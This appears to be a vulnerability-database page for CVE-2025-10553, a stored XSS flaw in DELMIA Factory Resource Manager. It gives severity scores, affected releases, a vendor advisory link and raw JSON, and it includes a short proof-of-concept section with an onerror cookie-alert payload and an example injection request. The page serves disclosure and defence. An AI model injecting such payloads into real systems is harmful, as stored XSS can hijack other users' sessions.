Security Vulnerability Report
CVE-2025-10553 CVSS 8.7 HIGH

CVE-2025-10553

Published: 2026-03-31 09:16:22
Last Modified: 2026-04-06 15:17:34

Description

A Stored Cross-site Scripting (XSS) vulnerability affecting Factory Resource Management in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session.

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:* - VULNERABLE
3DEXPERIENCE R2023x
3DEXPERIENCE R2024x
3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  Proof of Concept (PoC) for CVE-2025-10553
  Description: Stored XSS in Factory Resource Management field
-->
<script>
// Malicious payload to be injected into a vulnerable field (e.g., Resource Name or Description)
// This payload displays the document cookie in an alert box
var payload = '<img src=x onerror=alert(document.cookie)>';

// Simulation of the injection request
// In a real scenario, an attacker would send a POST request to the vulnerable endpoint
// Example Request:
// POST /api/factory/resource/create HTTP/1.1
// Host: target-domain.com
// { "name": "Resource1", "description": "<img src=x onerror=alert(1)>" }
console.log('Injecting payload: ' + payload);
alert('If this alert appears when viewing the resource list, the vulnerability is confirmed.');
</script>

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10553 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10553", "sourceIdentifier": "[email protected]", "published": "2026-03-31T09:16:21.823", "lastModified": "2026-04-06T15:17:33.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-site Scripting (XSS) vulnerability affecting Factory Resource Management in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenado que afecta a la Gestión de Recursos de Fábrica en DELMIA Factory Resource Manager desde la versión 3DEXPERIENCE R2023x hasta la versión 3DEXPERIENCE R2025x permite a un atacante ejecutar código de script arbitrario en la sesión del navegador del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": 
false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "5D800681-01F0-43E4-9525-BE188167D292"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10553", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}